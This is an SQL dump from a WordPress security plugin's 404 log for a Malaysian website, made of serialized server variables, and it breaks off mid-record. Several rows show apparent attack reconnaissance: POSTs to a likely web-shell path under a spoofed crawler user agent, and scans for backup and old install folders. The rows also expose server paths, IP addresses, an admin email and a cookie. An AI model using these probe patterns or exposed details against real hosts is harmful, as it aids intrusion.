http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"219.243.230.226\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"219.243.230.226\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/UploadFiles/1.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/UploadFiles/1.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XayM-ANyE4PJlyugCritmwAAAIc\";s:12:\"REDIRECT_URL\";s:18:\"/UploadFiles/1.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"57265\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/UploadFiles/1.asp\";s:10:\"SCRIPT_URL\";s:18:\"/UploadFiles/1.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XayM-ANyE4PJlyugCritmwAAAIc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571589372.3224\";s:12:\"REQUEST_TIME\";s:10:\"1571589372\";}}','notice','2019-10-20 16:36:14','2019-10-20 16:36:12',35340848,37137544,'http://bintara.com.my//UploadFiles/1.asp',1,0,'219.243.230.226'),(28519,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//UploadFiles/1.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"203.93.176.95\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"203.93.176.95\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/UploadFiles/1.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/UploadFiles/1.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XayNBizkrbMRqg8MvgzwVQAAAEM\";s:12:\"REDIRECT_URL\";s:18:\"/UploadFiles/1.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"57901\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/UploadFiles/1.asp\";s:10:\"SCRIPT_URL\";s:18:\"/UploadFiles/1.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XayNBizkrbMRqg8MvgzwVQAAAEM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571589382.5363\";s:12:\"REQUEST_TIME\";s:10:\"1571589382\";}}','notice','2019-10-20 16:36:24','2019-10-20 16:36:22',35268128,37060984,'http://bintara.com.my//UploadFiles/1.asp',1,0,'203.93.176.95'),(28520,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:40:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/wordpress/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:33:\"https://bintara.com.my/wordpress/\";s:19:\"REDIRECT_SCRIPT_URL\";s:11:\"/wordpress/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XayqdyDLdtmxqeKZJu800AAAAlc\";s:12:\"REDIRECT_URL\";s:11:\"/wordpress/\";s:11:\"REMOTE_ADDR\";s:12:\"35.225.116.3\";s:11:\"REMOTE_PORT\";s:5:\"53869\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/wordpress/\";s:10:\"SCRIPT_URL\";s:11:\"/wordpress/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XayqdyDLdtmxqeKZJu800AAAAlc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571596919.8004\";s:12:\"REQUEST_TIME\";s:10:\"1571596919\";}}','notice','2019-10-20 18:42:15','2019-10-20 18:42:00',35392864,37202880,'https://bintara.com.my/wordpress/',1,0,'35.225.116.3'),(28521,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:4:\"/wp/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=1f6a4bdcc00f957045a781c5725345d2\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:26:\"https://bintara.com.my/wp/\";s:19:\"REDIRECT_SCRIPT_URL\";s:4:\"/wp/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XayqiiDLdtmxqeKZJu804QAAAko\";s:12:\"REDIRECT_URL\";s:4:\"/wp/\";s:11:\"REMOTE_ADDR\";s:12:\"35.225.116.3\";s:11:\"REMOTE_PORT\";s:5:\"53480\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:26:\"https://bintara.com.my/wp/\";s:10:\"SCRIPT_URL\";s:4:\"/wp/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XayqiiDLdtmxqeKZJu804QAAAko\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571596939.271\";s:12:\"REQUEST_TIME\";s:10:\"1571596939\";}}','notice','2019-10-20 18:42:21','2019-10-20 18:42:19',34969160,36782208,'https://bintara.com.my/wp/',1,0,'35.225.116.3'),(28522,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:6:\"/blog/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=1f6a4bdcc00f957045a781c5725345d2\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/blog/\";s:19:\"REDIRECT_SCRIPT_URL\";s:6:\"/blog/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XayqkSDLdtmxqeKZJu806QAAAkY\";s:12:\"REDIRECT_URL\";s:6:\"/blog/\";s:11:\"REMOTE_ADDR\";s:12:\"35.225.116.3\";s:11:\"REMOTE_PORT\";s:5:\"62007\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:28:\"https://bintara.com.my/blog/\";s:10:\"SCRIPT_URL\";s:6:\"/blog/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XayqkSDLdtmxqeKZJu806QAAAkY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571596945.6097\";s:12:\"REQUEST_TIME\";s:10:\"1571596945\";}}','notice','2019-10-20 18:42:27','2019-10-20 18:42:25',34967472,36777760,'https://bintara.com.my/blog/',1,0,'35.225.116.3'),(28523,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:5:\"/old/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=1f6a4bdcc00f957045a781c5725345d2\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:27:\"https://bintara.com.my/old/\";s:19:\"REDIRECT_SCRIPT_URL\";s:5:\"/old/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XayqlqjZzpoQqaKQA3L2zgAAAM0\";s:12:\"REDIRECT_URL\";s:5:\"/old/\";s:11:\"REMOTE_ADDR\";s:12:\"35.225.116.3\";s:11:\"REMOTE_PORT\";s:5:\"59895\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:27:\"https://bintara.com.my/old/\";s:10:\"SCRIPT_URL\";s:5:\"/old/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XayqlqjZzpoQqaKQA3L2zgAAAM0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571596950.7778\";s:12:\"REQUEST_TIME\";s:10:\"1571596950\";}}','notice','2019-10-20 18:42:33','2019-10-20 18:42:31',34967288,36770240,'https://bintara.com.my/old/',1,0,'35.225.116.3'),(28524,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:6:\"/test/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=1f6a4bdcc00f957045a781c5725345d2\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/test/\";s:19:\"REDIRECT_SCRIPT_URL\";s:6:\"/test/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xayqoz3@-6BuXzuYs05XxAAAAoc\";s:12:\"REDIRECT_URL\";s:6:\"/test/\";s:11:\"REMOTE_ADDR\";s:12:\"35.225.116.3\";s:11:\"REMOTE_PORT\";s:5:\"50607\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:28:\"https://bintara.com.my/test/\";s:10:\"SCRIPT_URL\";s:6:\"/test/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xayqoz3@-6BuXzuYs05XxAAAAoc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571596963.4366\";s:12:\"REQUEST_TIME\";s:10:\"1571596963\";}}','notice','2019-10-20 18:42:45','2019-10-20 18:42:43',34967472,36777760,'https://bintara.com.my/test/',1,0,'35.225.116.3'),(28525,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:8:\"/backup/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=1f6a4bdcc00f957045a781c5725345d2\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:30:\"https://bintara.com.my/backup/\";s:19:\"REDIRECT_SCRIPT_URL\";s:8:\"/backup/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XayqqCDLdtmxqeKZJu80@AAAAkY\";s:12:\"REDIRECT_URL\";s:8:\"/backup/\";s:11:\"REMOTE_ADDR\";s:12:\"35.225.116.3\";s:11:\"REMOTE_PORT\";s:5:\"51444\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:30:\"https://bintara.com.my/backup/\";s:10:\"SCRIPT_URL\";s:8:\"/backup/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XayqqCDLdtmxqeKZJu80@AAAAkY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571596969.1186\";s:12:\"REQUEST_TIME\";s:10:\"1571596969\";}}','notice','2019-10-20 18:42:51','2019-10-20 18:42:49',34969336,36782872,'https://bintara.com.my/backup/',1,0,'35.225.116.3'),(28526,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:6:\"/temp/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=1f6a4bdcc00f957045a781c5725345d2\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/temp/\";s:19:\"REDIRECT_SCRIPT_URL\";s:6:\"/temp/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XayqriDLdtmxqeKZJu80@gAAAkg\";s:12:\"REDIRECT_URL\";s:6:\"/temp/\";s:11:\"REMOTE_ADDR\";s:12:\"35.225.116.3\";s:11:\"REMOTE_PORT\";s:5:\"49860\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:28:\"https://bintara.com.my/temp/\";s:10:\"SCRIPT_URL\";s:6:\"/temp/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XayqriDLdtmxqeKZJu80@gAAAkg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571596974.9104\";s:12:\"REQUEST_TIME\";s:10:\"1571596974\";}}','notice','2019-10-20 18:42:56','2019-10-20 18:42:55',34967472,36777760,'https://bintara.com.my/temp/',1,0,'35.225.116.3'),(28527,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:9:\"/ptz-pro/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/ptz-pro/\";s:19:\"REDIRECT_SCRIPT_URL\";s:9:\"/ptz-pro/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XayvHT3@-6BuXzuYs05ZcAAAAoE\";s:12:\"REDIRECT_URL\";s:9:\"/ptz-pro/\";s:11:\"REMOTE_ADDR\";s:11:\"40.77.167.3\";s:11:\"REMOTE_PORT\";s:5:\"21332\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:31:\"https://bintara.com.my/ptz-pro/\";s:10:\"SCRIPT_URL\";s:9:\"/ptz-pro/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"w